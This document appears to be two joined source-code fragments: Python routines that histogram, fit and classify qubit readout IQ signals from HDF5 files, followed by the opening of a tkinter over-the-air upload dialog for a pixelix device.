# GF_is_G = hist_discriminant(GF_G_fit_h, GF_F_fit_h)
# GF_is_F = np.logical_not(GF_is_G)
# EF_is_E = hist_discriminant(EF_E_fit_h, EF_F_fit_h)
# EF_is_F = np.logical_not(EF_is_E)
if plot:
fig3, axs = plt.subplots(2, 3, figsize = (12,8))
viridis = cm.get_cmap('magma', 256)
newcolors = viridis(np.linspace(0, 1, 256))
gray = np.array([0.1, 0.1, 0.1, 0.1])
newcolors[128-5: 128+5] = gray
newcmp = ListedColormap(newcolors)
ax1 = axs[0,0]
ax2 = axs[0,1]
ax3 = axs[0,2]
ax1.set_title("Sge - inputs G and E")
ax1.pcolormesh(bins_GE_G, bins_GE_G, h_GE_G+h_GE_E)
ax2.set_title("Sgf - inputs G and F")
# ax2.pcolormesh(bins_GF_G, bins_GF_F, h_GF_G+h_GF_F)
ax3.set_title("Sef - inputs E and F")
# ax3.pcolormesh(bins_EF_E, bins_EF_F, h_EF_E+h_EF_F)
#*(GE_is_G-1/2)
scale = np.max((GE_G_fit_h+GE_E_fit_h))
pc1 = axs[1,0].pcolormesh(bins_GE_G, bins_GE_G, (GE_G_fit_h+GE_E_fit_h)*(GE_is_G-1/2)/scale*5, cmap = newcmp, vmin = -1, vmax = 1)
plt.colorbar(pc1, ax = axs[1,0],fraction=0.046, pad=0.04)
GE_G_fit.plot_on_ax(axs[1,0])
axs[1,0].add_patch(GE_G_fit.sigma_contour())
GE_E_fit.plot_on_ax(axs[1,0])
axs[1,0].add_patch(GE_E_fit.sigma_contour())
# scale = np.max((GF_G_fit_h+GF_F_fit_h))
# pc2 = axs[1,1].pcolormesh(bins_GE_G, bins_GE_G, (GF_is_G-1/2)*(GF_G_fit_h+GF_F_fit_h)/scale*5, cmap = newcmp, vmin = -1, vmax = 1)
# plt.colorbar(pc1, ax = axs[1,1],fraction=0.046, pad=0.04)
# GF_G_fit.plot_on_ax(axs[1,1])
# axs[1,1].add_patch(GF_G_fit.sigma_contour())
# GF_F_fit.plot_on_ax(axs[1,1])
# axs[1,1].add_patch(GF_F_fit.sigma_contour())
# scale = np.max((EF_E_fit_h+EF_F_fit_h))
# pc3 = axs[1,2].pcolormesh(bins_GE_G, bins_GE_G, (EF_is_E-1/2)*(EF_E_fit_h+EF_F_fit_h)/scale*5, cmap = newcmp, vmin = -1, vmax = 1)
# plt.colorbar(pc1, ax = axs[1,2],fraction=0.046, pad=0.04)
# EF_E_fit.plot_on_ax(axs[1,2])
# axs[1,2].add_patch(EF_E_fit.sigma_contour())
# EF_F_fit.plot_on_ax(axs[1,2])
# axs[1,2].add_patch(EF_F_fit.sigma_contour())
fig3.tight_layout(h_pad = 0.1, w_pad = 1)
for ax in np.array(axs).flatten():
ax.set_aspect(1)
ax.grid()
#classify the records - done for each weight function
results = []
GE_results = []
GF_results = []
EF_results = []
all_I = np.vstack((sI_c1_classify, sI_c2_classify))
all_Q = np.vstack((sQ_c1_classify, sQ_c2_classify))
# print("all_I shape: ", np.shape(all_I))
# print(np.shape(list(zip(sI_c1, sQ_c1))))
for record in list(zip(all_I, all_Q)):
It, Qt = record[0], record[1]
#GE weights
ge_I = np.dot(Sge_I, It)+np.dot(Sge_Q, Qt)
ge_Q = np.dot(Sge_I, Qt)-np.dot(Sge_Q, It)
Iloc = np.digitize(ge_I, bins_GE_G)
Qloc = np.digitize(ge_Q, bins_GE_G)
if Iloc >= 99: Iloc = 98
if Qloc >= 99: Qloc = 98
#if 1 it's G
Sge_result = GE_is_G[Iloc, Qloc]
#GF weights
# gf_I = np.dot(Sgf_I, It)+np.dot(Sgf_Q, Qt)
# gf_Q = np.dot(Sgf_I, Qt)-np.dot(Sgf_Q, It)
# Iloc = np.digitize(gf_I, bins_GF_G)
# Qloc = np.digitize(gf_Q, bins_GF_G)
# if Iloc >= 99: Iloc = 98
# if Qloc >= 99: Qloc = 98
# #if 1 it's G
# Sgf_result = GF_is_G[Iloc, Qloc]
# #EF weights
# ef_I = np.dot(Sef_I, It)+np.dot(Sef_Q, Qt)
# ef_Q = np.dot(Sef_I, Qt)-np.dot(Sef_Q, It)
# Iloc = np.digitize(ef_I, bins_EF_E)
# Qloc = np.digitize(ef_Q, bins_EF_E)#edge-shifting
# if Iloc >= 99: Iloc = 98
# if Qloc >= 99: Qloc = 98
#if 1 it's E
# Sef_result = EF_is_E[Iloc, Qloc]
# print(Sge_result)
# print(Sgf_result)
if Sge_result:
result = 1 #G
else:
result = 2 #E
results.append(result)
GE_results.append(Sge_result)
# GF_results.append(Sgf_result)
# EF_results.append(Sef_result)
results = np.array(results)
#rescale so G-> 1, E-> 2, F -> 3
GE_results = np.logical_not(np.array(GE_results))+1
# GF_results = np.logical_not(np.array(GF_results))*2+1
# EF_results = np.logical_not(np.array(EF_results))+2
div1 = np.shape(sI_c1_classify)[0]
numRecords = 2*div1
# print(div1)
correct_classifications = np.append(np.ones(div1), 2*np.ones(div1))
numberNull = np.sum(results[results == 4]/4)
fidelity = np.round(np.sum(correct_classifications==results)/numRecords, 3)
if plot:
fig, ax = plt.subplots(5,1, figsize = (4, 8))
viridisBig = cm.get_cmap('viridis', 512)
_cmap = ListedColormap(viridisBig(np.linspace(0, 1, 256)))
scale = Norm(vmin = 1, vmax = 4)
ax[0].set_title("Correct classifications")
ax[0].imshow([correct_classifications, correct_classifications], interpolation = 'none', cmap = _cmap, norm = scale)
ax[1].set_title("GE classifications")
ax[1].imshow([GE_results,GE_results], interpolation = 'none', cmap = _cmap, norm = scale)
# ax[2].set_title("GF classifications")
# ax[2].imshow([GF_results,GF_results], interpolation = 'none', cmap = _cmap, norm = scale)
# ax[3].set_title("EF classifications")
# ax[3].imshow([EF_results,EF_results], interpolation = 'none', cmap = _cmap, norm = scale)
ax[4].set_title("Final classifications")
ax[4].get_yaxis().set_ticks([])
ax[4].set_label("Record number")
ax[4].imshow([results, results], interpolation = 'none', cmap = _cmap, norm = scale)
ax[4].set_aspect(1000)
for axi in ax:
axi.get_yaxis().set_ticks([])
axi.set_aspect(1000)
# ax[2].imshow([right, right], interpolation = 'none')
# ax[2].set_aspect(1000)
fig.tight_layout(h_pad = 1, w_pad = 1)
if debug:
print("checking sum: ", np.max(correct_classifications[2*div1:-1]==results[2*div1:-1]))
print("Number of Null results: ", numberNull)
print("Sge Imbar/sigma: ", np.linalg.norm(GE_G_fit.center_vec()-GE_E_fit.center_vec())/GE_G_fit.info_dict['sigma_x'])
# print("Sgf Imbar/sigma: ", np.linalg.norm(GF_G_fit.center_vec()-GF_F_fit.center_vec())/GF_G_fit.info_dict['sigma_x'])
# print("Sef Imbar/sigma: ", np.linalg.norm(EF_E_fit.center_vec()-EF_F_fit.center_vec())/EF_E_fit.info_dict['sigma_x'])
G_fidelity = np.round(np.sum(correct_classifications[0:div1]==results[0:div1])/div1, 3)
E_fidelity = np.round(np.sum(correct_classifications[div1:2*div1]==results[div1:2*div1])/div1, 3)
# F_fidelity = np.round(np.sum(correct_classifications[2*div1:-1]==results[2*div1:-1])/div1, 3)
return G_fidelity, E_fidelity, 0, fidelity, 0
def boxcar_histogram(fig, ax,start_pt, stop_pt, sI, sQ, Ioffset = 0, Qoffset = 0, scale = 1, num_bins = 100):
I_bground = Ioffset
Q_bground = Qoffset
# print(I_bground, Q_bground)
I_pts = []
Q_pts = []
for I_row, Q_row in zip(sI, sQ):
I_pts.append(np.average(I_row[start_pt:stop_pt]-I_bground))
Q_pts.append(np.average(Q_row[start_pt:stop_pt]-Q_bground))
# plt.imshow(np.histogram2d(np.array(I_pts), np.array(Q_pts))[0])
divider = make_axes_locatable(ax)
ax.set_aspect(1)
bins = np.linspace(-1,1, num_bins)*scale
(h, xedges, yedges, im) = ax.hist2d(I_pts, Q_pts, bins = [bins, bins])
cax = divider.append_axes('right', size='5%', pad=0.05)
fig.colorbar(im, cax = cax, orientation = 'vertical')
# ax.hexbin(I_pts, Q_pts, extent = np.array([-1,1,-1,1])*scale)
# ax.set_xticks(np.array([-100,-75,-50,-25,0,25,50,75,100])*scale/100)
# ax.set_yticks(np.array([-100,-75,-50,-25,0,25,50,75,100])*scale/100)
ax.grid()
return bins, h
def weighted_histogram_mpl(weight_function_arr_I, weight_function_arr_Q, sI, sQ, scale = 1, num_bins = 100, record_track = False, plot = False, fig = None, ax = None):
I_pts = []
Q_pts = []
# print("size check: ", np.shape(sI))
# print("weights: ", np.shape(weight_function_arr))
for I_row, Q_row in zip(sI, sQ):
I_pts.append(np.dot(I_row, weight_function_arr_I)+np.dot(Q_row, weight_function_arr_Q))
Q_pts.append(np.dot(Q_row, weight_function_arr_I)-np.dot(I_row, weight_function_arr_Q))
# plt.imshow(np.histogram2d(np.array(I_pts), np.array(Q_pts))[0])
bins = np.linspace(-1,1, num_bins)*scale
(h, xedges, yedges, im) = ax.hist2d(I_pts, Q_pts, bins = [bins, bins])
if plot:
divider = make_axes_locatable(ax)
ax.set_aspect(1)
cax = divider.append_axes('right', size='5%', pad=0.05)
fig.colorbar(im, cax = cax, orientation = 'vertical')
if record_track:
fig2, ax2 = plt.subplots()
ax2.set_title("Record Tracking: Demodulated signals")
ax2.set_xlabel("time (~us)")
ax2.set_ylabel("$\phi(t)$")
unwrapped_phases = np.mod(np.unwrap(np.arctan(np.array(I_pts[0:500])/np.array(Q_pts[0:500])), period = np.pi), 2*np.pi)
ax2.plot(np.arange(500)*500, unwrapped_phases, '.', label = "phi(t)")
print("Average phase difference between records: ", np.average(np.diff(unwrapped_phases))/np.pi*180, ' degrees')
# ax2.hlines(-12*np.pi, 0, 20000)
return bins, h, I_pts, Q_pts
def weighted_histogram(weight_function_arr_I, weight_function_arr_Q, sI, sQ, scale = 1, num_bins = 100, record_track = False, plot = False, fig = None, ax = None):
I_pts = []
Q_pts = []
# print("size check: ", np.shape(sI))
# print("weights: ", np.shape(weight_function_arr))
for I_row, Q_row in zip(sI, sQ):
I_pts.append(np.dot(I_row, weight_function_arr_I)+np.dot(Q_row, weight_function_arr_Q))
Q_pts.append(np.dot(Q_row, weight_function_arr_I)-np.dot(I_row, weight_function_arr_Q))
# I_pts.append(np.dot(I_row, weight_function_arr_I))
# Q_pts.append(np.dot(Q_row, weight_function_arr_Q))
# plt.imshow(np.histogram2d(np.array(I_pts), np.array(Q_pts))[0])
bins = np.linspace(-1,1, num_bins)*scale
(h, xedges, yedges) = np.histogram2d(I_pts, Q_pts, bins = [bins, bins], density = False)
if plot:
im = ax.pcolormesh(bins, bins, h)
divider = make_axes_locatable(ax)
ax.set_aspect(1)
cax = divider.append_axes('right', size='5%', pad=0.05)
fig.colorbar(im, cax = cax, orientation = 'vertical')
if record_track:
fig2, ax2 = plt.subplots()
ax2.set_title("Record Tracking: Demodulated signals")
ax2.set_xlabel("time (~us)")
ax2.set_ylabel("$\phi(t)$")
unwrapped_phases = np.mod(np.unwrap(np.arctan(np.array(sI[0:500, 100])/np.array(sQ[0:500, 100])), period = np.pi), 2*np.pi)
ax2.plot(np.arange(100)*500, unwrapped_phases, '.', label = "phi(t)")
print("Average phase difference between records: ", np.average(np.diff(unwrapped_phases))/np.pi*180, ' degrees')
# ax2.hlines(-12*np.pi, 0, 20000)
return bins, h, I_pts, Q_pts
'''
def Gaussian_2D(M,amplitude, xo, yo, sigma_x, sigma_y, theta):
x, y = M
xo = float(xo)
yo = float(yo)
a = (np.cos(theta)**2)/(2*sigma_x**2) + (np.sin(theta)**2)/(2*sigma_y**2)
b = -(np.sin(2*theta))/(4*sigma_x**2) + (np.sin(2*theta))/(4*sigma_y**2)
c = (np.sin(theta)**2)/(2*sigma_x**2) + (np.cos(theta)**2)/(2*sigma_y**2)
g = amplitude*np.exp( - (a*((x-xo)**2) + 2*b*(x-xo)*(y-yo)
+ c*((y-yo)**2)))
return g
'''
def Gaussian_2D(M,amplitude, xo, yo, sigma):
theta = 0
x, y = M
xo = float(xo)
yo = float(yo)
a = (np.cos(theta)**2)/(2*sigma**2) + (np.sin(theta)**2)/(2*sigma**2)
b = -(np.sin(2*theta))/(4*sigma**2) + (np.sin(2*theta))/(4*sigma**2)
c = (np.sin(theta)**2)/(2*sigma**2) + (np.cos(theta)**2)/(2*sigma**2)
g = amplitude*np.exp( - (a*((x-xo)**2) + 2*b*(x-xo)*(y-yo)
+ c*((y-yo)**2)))
return g
def Gaussian_2D_tilted(M,amplitude, xo, yo, sigma, theta = 0):
x, y = M
xo = float(xo)
yo = float(yo)
a = (np.cos(theta)**2)/(2*sigma**2) + (np.sin(theta)**2)/(2*sigma**2)
b = -(np.sin(2*theta))/(4*sigma**2) + (np.sin(2*theta))/(4*sigma**2)
c = (np.sin(theta)**2)/(2*sigma**2) + (np.cos(theta)**2)/(2*sigma**2)
g = amplitude*np.exp( - (a*((x-xo)**2) + 2*b*(x-xo)*(y-yo)
+ c*((y-yo)**2)))
return g
class Gaussian_info:
def __init__(self):
self.info_dict = {}
def print_info(self):
for key, val in self.info_dict.items():
if key == 'popt':
pass
elif key == 'pcov':
pass
else:
print(key, ': ', val)
def __sub__(self, other_GC):
sub_class = Gaussian_info()
for key, val in self.info_dict.items():
# print(key, val)
if type(val) == np.float64:
sub_class.info_dict[key] = val - other_GC.info_dict[key]
else:
sub_class.info_dict[key] = None
return sub_class
def center_vec(self):
return np.array([self.info_dict['x0'], self.info_dict['y0']])
def plot_on_ax(self, ax, displacement = np.array([0,0]), color = 'white'):
ax.annotate("", xy=self.center_vec(), xytext=(0,0), arrowprops=dict(arrowstyle = '->', lw = 3, color = color))
def plot_array(self):
return Gaussian_2D(*self.info_dict['popt'])
def sigma_contour(self):
x0, y0 = self.center_vec()
sx = self.info_dict['sigma_x']
sy = self.info_dict['sigma_y']
# angle = self.info_dict['theta']
angle = 0
return Ellipse((x0, y0), sx, sy, angle = angle/(2*np.pi)*360,
fill = False,
ls = '--',
color = 'red',
lw = 2)
def fit_2D_Gaussian(name,
bins,
h_arr,
guessParams,
max_fev = 10000,
contour_line = 0,
debug = False):
if debug:
print("fitting with maxfev = ", max_fev)
X, Y = np.meshgrid(bins[0:-1], bins[0:-1])
xdata, ydata= np.vstack((X.ravel(), Y.ravel())), h_arr.ravel()
# print('xdata_shape: ', np.shape(xdata))
# print("y shape: ",np.shape(ydata))
#,amplitude, xo, yo, sigma_x, sigma_y, theta
bounds = ([0,np.min(bins), np.min(bins), 0],
[10*np.max(h_arr), np.max(bins), np.max(bins), np.max(bins)])
# print(bounds)
popt, pcov = curve_fit(Gaussian_2D, xdata, ydata, p0 = guessParams, maxfev = max_fev, bounds = bounds)
GC = Gaussian_info()
GC.info_dict['name'] = name
GC.info_dict['canvas'] = xdata
GC.info_dict['amplitude'] = popt[0]
GC.info_dict['x0'] = popt[1]
GC.info_dict['y0'] = popt[2]
GC.info_dict['sigma_x'] = np.abs(popt[3])
GC.info_dict['sigma_y'] = np.abs(popt[3])
# GC.info_dict['theta'] = popt[4]
GC.info_dict['popt'] = popt
GC.info_dict['pcov'] = pcov
# GC.info_dict['contour'] = get_contour_line(X, Y, Gaussian_2D(xdata, *popt).reshape(resh_size), contour_line = contour_line)
return GC
def extract_3pulse_phase_differences_from_filepath(datapath, numRecords = 3840*2, window = [0, -1], bc_window = [50, 150], scale = 2):
dd = all_datadicts_from_hdf5(datapath)['data']
offset = window[0]
rtrim = window[-1]
time_unit = dd['time']['unit']
I_offset, Q_offset = 0,0
# print(np.size(np.unique(dd['time']['values'])))
time_vals = dd['time']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))
rec_unit = dd['record_num']['unit']
rec_num = dd['record_num']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))
I_G = dd['I_G']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-I_offset
I_E = dd['I_E']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-I_offset
I_F = dd['I_F']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-I_offset
Q_G = dd['Q_G']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-Q_offset
Q_E = dd['Q_E']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-Q_offset
Q_F = dd['Q_F']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-Q_offset
#averages
I_G_avg = np.average(I_G, axis = 0)
I_E_avg = np.average(I_E, axis = 0)
I_F_avg = np.average(I_F, axis = 0)
Q_G_avg = np.average(Q_G, axis = 0)
Q_E_avg = np.average(Q_E, axis = 0)
Q_F_avg = np.average(Q_F, axis = 0)
WF = np.zeros(np.size(time_vals[0]))
WF[bc_window[0]:bc_window[1]] = 1
Sge = Sgf = Sef = WF
fig2, ax11 = plt.subplots()
bins_GE_G, h_GE_G, I_pts, Q_pts = weighted_histogram(fig2, ax11, Sge, I_G, Q_G, scale = scale, record_track = True)
fig2, ax2 = plt.subplots()
ax2.set_title("Record Tracking")
ax2.set_xlabel("time (~us)")
ax2.set_ylabel("$\phi(t)$")
unwrapped_phases = np.unwrap(np.arctan(np.array(I_pts[0:500])/np.array(Q_pts[0:500])), period = np.pi)
ax2.plot(np.arange(500)*500, unwrapped_phases, '.', label = "phi(t)")
print("Average phase difference between records: ", np.average(np.diff(unwrapped_phases))/np.pi*180, ' degrees')
ax2.hlines(-12*np.pi, 0, 20000)
# ax2.set_aspect(1)
# ax2.plot(Q_pts[0:500], '.', label = "Q")
ax2.grid()
return np.average(np.diff(unwrapped_phases))/np.pi*180
def extract_3pulse_noise_from_filepath(datapath, numRecords = 3840*2, window = [0, -1]):
dd = all_datadicts_from_hdf5(datapath)['data']
offset = window[0]
rtrim = window[-1]
time_unit = dd['time']['unit']
I_offset, Q_offset = 0,0
# print(np.size(np.unique(dd['time']['values'])))
time_vals = dd['time']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))
rec_unit = dd['record_num']['unit']
rec_num = dd['record_num']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))
I_G = dd['I_G']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-I_offset
I_E = dd['I_E']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-I_offset
I_F = dd['I_F']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-I_offset
Q_G = dd['Q_G']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-Q_offset
Q_E = dd['Q_E']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-Q_offset
Q_F = dd['Q_F']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-Q_offset
#averages
I_G_avg = np.average(I_G, axis = 0)
I_E_avg = np.average(I_E, axis = 0)
I_F_avg = np.average(I_F, axis = 0)
Q_G_avg = np.average(Q_G, axis = 0)
Q_E_avg = np.average(Q_E, axis = 0)
Q_F_avg = np.average(Q_F, axis = 0)
print(np.shape(I_G))
print(np.shape(I_G_avg))
print(np.average(I_G_avg))
return [np.sqrt(np.var(np.sqrt((I_G[:, offset: rtrim]-I_G_avg[offset:rtrim])**2+(Q_G[:, offset: rtrim]-Q_G_avg[offset:rtrim])**2))),
np.sqrt(np.var(np.sqrt((I_E[:, offset: rtrim]-I_E_avg[offset:rtrim])**2+(Q_E[:, offset: rtrim]-Q_E_avg[offset:rtrim])**2))),
np.sqrt(np.var(np.sqrt((I_F[:, offset: rtrim]-I_F_avg[offset:rtrim])**2+(Q_F[:, offset: rtrim]-Q_F_avg[offset:rtrim])**2)))]
def extract_3pulse_pwr_from_filepath(datapath, numRecords = 3840*2, window = [0, -1]):
dd = all_datadicts_from_hdf5(datapath)['data']
offset = window[0]
rtrim = window[-1]
time_unit = dd['time']['unit']
I_offset, Q_offset = 0,0
# print(np.size(np.unique(dd['time']['values'])))
time_vals = dd['time']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))
rec_unit = dd['record_num']['unit']
rec_num = dd['record_num']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))
I_G = dd['I_G']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-I_offset
I_E = dd['I_E']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-I_offset
I_F = dd['I_F']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-I_offset
Q_G = dd['Q_G']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-Q_offset
Q_E = dd['Q_E']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-Q_offset
Q_F = dd['Q_F']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-Q_offset
#averages
I_G_avg = np.average(I_G, axis = 0)
I_E_avg = np.average(I_E, axis = 0)
I_F_avg = np.average(I_F, axis = 0)
Q_G_avg = np.average(Q_G, axis = 0)
Q_E_avg = np.average(Q_E, axis = 0)
Q_F_avg = np.average(Q_F, axis = 0)
return np.average(np.sqrt(I_G_avg**2+Q_G_avg**2)[offset:rtrim]), np.average(np.sqrt(I_E_avg**2+Q_E_avg**2)[offset:rtrim]), np.average(np.sqrt(I_F_avg**2+Q_F_avg**2)[offset:rtrim]),
def extract_3pulse_histogram_from_filepath(datapath, plot = False, hist_scale = None, numRecords = 3840*2, rec_start = 0, rec_stop = -1, IQ_offset = (0,0), fit = False, lpf = True, lpf_wc = 50e6, boxcar = False, bc_window = [50, 150], record_track = True, tuneup_plots = True, debug = False, tstart_index = 0, tstop_index = -1, phase_correction_rate = 0, figscale = 1, guess = 0, rec_skip = 5):
I_offset, Q_offset = IQ_offset
dd = all_datadicts_from_hdf5(datapath)['data']
if debug:
print("dd keys",dd.keys())
time_unit = dd['time']['unit']
# print(np.size(np.unique(dd['time']['values'])))
time_vals = dd['time']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))
rec_unit = dd['record_num']['unit']
rec_num = dd['record_num']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))
I_G = dd['I_G']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-I_offset
I_E = dd['I_E']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-I_offset
I_F = dd['I_F']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-I_offset
Q_G = dd['Q_G']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-Q_offset
Q_E = dd['Q_E']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-Q_offset
Q_F = dd['Q_F']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-Q_offset
#attempting to correct a rotating generator phase
pcr = phase_correction_rate
C = np.cos(pcr*rec_num)
S = np.sin(pcr*rec_num)
I_G = (I_G*C-Q_G*S).copy()
Q_G = (Q_G*C+I_G*S).copy()
I_E = (I_E*C-Q_E*S).copy()
Q_E = (Q_E*C+I_E*S).copy()
I_F = (I_F*C-Q_F*S).copy()
Q_F = (Q_F*C+I_F*S).copy()
return Process_One_Acquisition_3_state(datapath.split('/')[-1].split('\\')[-1], time_vals[0], I_G, I_E, I_F, Q_G, Q_E, Q_F,hist_scale = hist_scale, plot = plot, fit = fit, lpf = lpf, lpf_wc = lpf_wc, boxcar = boxcar, bc_window = bc_window, record_track = record_track, rec_start = rec_start, rec_stop = rec_stop, debug = debug, tstart_index = tstart_index, tstop_index = tstop_index, figscale = figscale, guess = guess, rec_skip = rec_skip)
def extract_2pulse_histogram_from_filepath(datapath, plot = False, hist_scale = None, numRecords = 3840*2, numRecordsUsed = 3840*2, IQ_offset = (0,0), fit = False, lpf = True, lpf_wc = 50e6, boxcar = False, bc_window = [50, 150], record_track = True, tuneup_plots = True, debug = False):
I_offset, Q_offset = IQ_offset
dd = all_datadicts_from_hdf5(datapath)['data']
if debug:
print("dd keys",dd.keys())
time_unit = dd['time']['unit']
# print(np.size(np.unique(dd['time']['values'])))
time_vals = dd['time']['values'].reshape((numRecords//2, np.size(dd['time']['values'])//(numRecords//2)))
print("Number of unique time values: %f"%np.size(np.unique(time_vals)))
rec_unit = dd['record_num']['unit']
rec_num = dd['record_num']['values'].reshape((numRecords//2, np.size(dd['time']['values'])//(numRecords//2)))
print("Number of unique records: %f"%np.size(np.unique(rec_num)))
print("User input of record number: %f"%np.size(np.unique(rec_num)))
I_G = dd['I_plus']['values'].reshape((numRecords//2, np.size(dd['time']['values'])//(numRecords//2)))-I_offset
I_E = dd['I_minus']['values'].reshape((numRecords//2, np.size(dd['time']['values'])//(numRecords//2)))-I_offset
# I_F = dd['I_F']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-I_offset
Q_G = dd['Q_plus']['values'].reshape((numRecords//2, np.size(dd['time']['values'])//(numRecords//2)))-Q_offset
Q_E = dd['Q_minus']['values'].reshape((numRecords//2, np.size(dd['time']['values'])//(numRecords//2)))-Q_offset
# Q_F = dd['Q_F']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-Q_offset
#averages
I_G_avg = np.average(I_G, axis = 0)
I_E_avg = np.average(I_E, axis = 0)
# I_F_avg = np.average(I_F, axis = 0)
Q_G_avg = np.average(Q_G, axis = 0)
Q_E_avg = np.average(Q_E, axis = 0)
# Q_F_avg = np.average(Q_F, axis = 0)
return Process_One_Acquisition_2_state(datapath.split('/')[-1].split('\\')[-1], time_vals[0], I_G, I_E, Q_G, Q_E,hist_scale = hist_scale, plot = plot, fit = fit, lpf = lpf, lpf_wc = lpf_wc, boxcar = boxcar, bc_window = bc_window, record_track = record_track, numRecordsUsed = numRecordsUsed, debug = debug)
def hist_discriminant(h1, h2):
#1 if in h1, 0 if in h2
return ((h1-h2)>0)
|
"""
MIT License
Copyright (c) 2019 - 2022 <NAME> <<EMAIL>>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================================================
The upload dialog (OTA) is shown after the build process. In the upload dialog
it is possible to setup the configuration for the own pixelix device, like
ip-address and etc.
"""
import tkinter as tk
import json
# pylint: disable=undefined-variable
Import("env") # type: ignore
class UploadModel():
"""The upload model provides access to the configuration data.
"""
def __init__(self, file_name):
self._filename = file_name
self._data_json = self._load(self._filename)
self._default_ip_address = "192.168.x.x"
self._default_port = 3232
self._default_password = "<PASSWORD>"
if self._data_json is None:
self._setup_model()
def _load(self, file_name):
data_json = None
try:
with open(file_name) as json_file:
data_json = json.load(json_file)
except FileNotFoundError:
pass
return data_json
def _save(self, file_name):
try:
with open(file_name, "w") as json_file:
json.dump(self._data_json, json_file, indent=4)
except FileNotFoundError:
pass
def _setup_model(self):
self._data_json = dict()
self._data_json["ipAddress"] = self._default_ip_address
self._data_json["port"] = self._default_port
self._data_json["password"] = self._default_password
def load(self):
"""Load configuration from filesystem.
"""
self._load(self._filename)
def save(self):
"""Store configuration in filesystem.
"""
self._save(self._filename)
def get_ip_address(self):
"""Get ip-address of remote device.
Returns:
str: IP-address
"""
ip_address = self._default_ip_address
if self._data_json is not None:
if "ipAddress" in self._data_json:
ip_address = self._data_json["ipAddress"]
return ip_address
def set_ip_address(self, ip_address):
"""Set ip-address of remote device.
Args:
ip_address (str): IP-Address
"""
self._data_json["ipAddress"] = ip_address
def get_port(self):
"""Get port for remote update.
Returns:
int: Port number
"""
port = self._default_port
if self._data_json is not None:
if "port" in self._data_json:
port = self._data_json["port"]
return port
def set_port(self, port):
"""Set port for remote update.
Args:
port (int): Port number
"""
self._data_json["port"] = port
def get_password(self):
"""Get password for remote access.
Returns:
str: Password
"""
password = <PASSWORD>
if self._data_json is not None:
if "password" in self._data_json:
password = self._data_json["password"]
return password
def set_password(self, password):
"""Set password for remote access.
Args:
password (str): Password
"""
self._data_json["password"] = password
class App(tk.Tk):
"""The main application class, which represents the main window.
"""
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs)
self._upload_model = UploadModel("upload.json")
self._ip_address = tk.StringVar()
self._port = tk.IntVar()
self._password = tk.StringVar()
self._is_aborted = True
def _update_gui(self):
self._ip_address.set(self._upload_model.get_ip_address())
self._port.set(self._upload_model.get_port())
self._password.set(self._upload_model.get_password())
def _update_model(self):
self._upload_model.set_ip_address(self._ip_address.get())
self._upload_model.set_port(self._port.get())
self._upload_model.set_password(self._password.get())
def _setup_gui(self):
self.title("Upload Utility")
frame = tk.Frame(self)
label_ip_address = tk.Label(frame, text="IP-Address:", anchor="w")
input_ip_address = tk.Entry(frame, textvariable=self._ip_address)
label_port = tk.Label(frame, text="Port:", anchor="w")
input_port = tk.Entry(frame, textvariable=self._port)
label_password = tk.Label(frame, text="Password:", anchor="w")
input_password = tk.Entry(frame, textvariable=self._password, show="*")
label_ip_address.pack(fill="x", expand=False)
